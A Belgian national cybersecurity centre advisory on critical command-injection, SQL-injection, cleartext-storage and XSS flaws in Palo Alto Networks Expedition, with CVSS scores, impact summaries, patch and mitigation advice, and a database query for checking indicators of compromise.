Initiatives for
As the national authority for Cybersecurity the CCB has developed several initiatives for specific publics which are presented here.
WARNING: CRITICAL VULNERABILITIES IN PALO ALTO NETWORKS EXPEDITION ENABLE UNAUTHENTICATED OS COMMAND INJECTION, PATCH IMMEDIATELY!
Image
Published : 11/10/2024
Reference:
Advisory #2024-239
Version:
1.0
Affected software:
Palo Alto Networks Expedition 1.2.96
Type:
OS command injection,SQL injection, Cleartext storage of sensitive information, Reflected XSS
CVE/CVSS:
CVE-2024-9463 9.9 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N)
CVE-2024-9464 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N)
CVE-2024-9465 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N)
CVE-2024-9466 8.2 (CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N)
CVE-2024-9467 7.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N)
Sources
https://security.paloaltonetworks.com/PAN-SA-2024-0010
Risks
On 09 September 2024, Palo Alto Networks published a security advisory about multiple critical security vulnerabilities in Expedition <1.2.96. Successful exploitation of these vulnerabilities could lead to full access to the entire Expedition filesystem and, by extension, credentials of PAN-OS firewalls. The vulnerabilities severely impact the Confidentiality, Integrity and Availability of these systems. These PAN-OS firewalls are at the border of your organization. They are the first defense for malicious traffic and are a crucial component in the network infrastructure, so it is essential to keep those secure. Palo Alto Networks reported no evidence of active exploitation in the wild at the moment of writing, but firewalls have been a primary target for cybercriminals for a long time.
Update 2024-10-29: A proof of concept (PoC) for CVE-2024-9464, CVE-2024-9465 and CVE-2024-9466 was recently posted on GitHub. While it’s still unclear how well it works, it's best to assume this vulnerability is now more likely to be targeted.
Description
The vulnerabilities outlined below impact Palo Alto Networks Expedition versions before 1.2.96. These vulnerabilities do not affect other products from Palo Alto Networks, including Cloud NGFW, PAN-OS, Panorama, and Prisma Access. However, it is essential to note that credentials for the PAN-OS firewall may be exposed because of exploiting these vulnerabilities in Expedition.
CVE-2024-9463 is an OS command injection vulnerability with a CVSS of 9.9. CVE-2024-9463 enables a remote, unauthenticated attacker to run arbitrary OS commands after successful exploitation. As a result, there could be a disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
CVE-2024-9464 is an OS command injection vulnerability with a CVSS of 9.3. In contrast to the previous one, a remote attacker needs to be authenticated with low privileges for a successful exploit, but the impact is the same. CVE-2024-9465 is an SQL injection vulnerability with a CVSS of 9.2.
CVE-2024-9465 enables a remote, unauthenticated attacker to access the contents of the Expedition database after successful exploitation. This content includes password hashes, usernames, device configurations, and device API keys. CVE-2024-9466 is a cleartext storage of sensitive information vulnerability with CVSS of 8.2.
CVE-2024- 9466 enables an authenticated attacker to access usernames, passwords and API keys used on the firewall. CVE-2024-9467 is a reflected XSS vulnerability with a CVSS of 7.
CVE-2024-9467 enables a remote, unauthenticated attacker to execute malicious JavaScript on a user's browser that is authenticated to Expedition. If this phishing is successful, the attacker could hijack the session with Expedition.
Recommended Actions
Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing. Palo Alto Networks reported this vulnerability is fixed with version Expedition 1.2.96 or later.
Mitigate
For systems where patching cannot be immediately applied, ensure that Expedition is shut down if not in use or that access to Expedition is restricted to authorized users/hosts/networks.
Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion. In case of an intrusion, you can report an incident via https://ccb.belgium.be/cert/report-incident While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise. Palo Alto Networks shared a check for indicators of compromise with the following command to be run on the Expedition system (replace root with your username):
MySQL -uroot -p -D pandb -e "SELECT * FROM cronjobs;"